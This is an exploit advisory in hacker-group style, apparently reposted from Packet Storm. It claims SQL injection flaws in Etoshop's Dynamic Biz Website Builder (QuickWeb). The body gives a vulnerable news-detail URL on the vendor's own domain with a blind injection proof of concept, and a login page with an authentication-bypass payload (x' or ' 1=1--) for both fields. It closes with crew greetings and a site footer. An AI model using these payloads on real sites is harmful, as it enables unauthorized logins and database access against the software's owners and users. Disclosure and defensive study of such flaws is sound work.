Dynamic Biz Website Builder from Etoshop.com suffers from remote SQL injection vulnerabilities.
73a82adc1101c05809d222fe146b1a7a50897b945b04fe023572a6289a94989f
=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[~] Tybe: Multiple Vulnerabilities
[~] Vendor: http://www.etoshop.com/
[+] Software: Dynamic Biz Website Builder (QuickWeb)
[+] infection: Multiple Vulnerabilities
[~] Version :
[~] author: R3d-D3v!L
[+] TEAM: ABH
[?] contact: X[at]hotmail.co.jp
[-]
[?] Date: 14.d3c.2ol3
[?] T!ME: 04:54 am GMT
[?] Home: abhsec.com
[^]
[?]
=====================================================================================
#Dynamic Biz Website Builder (QuickWeb)(MV) suffering from Multiple Vulnerabilities
=====================================================================================
[!] Exploit Already Tested ... on windows server 2008
[^] Error console:- Blind sql injection
dweb/apps/news-events/newdetail.asp?id=1' <--vuln -
[?] proof of concept : 1
www.etoshop.com/dweb/apps/news-events/newdetail.asp?id=1 and 1 =1 <--true--
[?] proof of concept 2 authbypass :
www.etoshop.com/dweb/login.asp
(/) UserID : x' or ' 1=1--
(\)Password : x' or ' 1=1--
[~]-----------------------------{(A.B.H)}----------------------------------------------------
#
[~] Greetz tO:virus_jordan&&H@CK3R M!ND&SyrianooĦąĈkỉŋg&ĦǒĿǻkőẾŁếstorầ&NetikertyAsenet...etc ;
#
[~] 70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ # ;
#
[~] special thanks :all soqor members & xp10 # ;
#
[?] special SupPoRT : packet storm & 1337day & Maksymilian Arciemowicz # ;
#
[?]---> ((R3d D3v!L<---palestine phoneix--->JUPA<---aNd--->Devil ro0t)) #;
#
[~]spechial FR!ND: they all are spechials ;) #;
#
[~] !'M 4R48!4N 3XPL0!73R. #;
#
[~](>D!R 4ll 0R D!E<) #;
#
[~]---------------------------------------------------------------------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed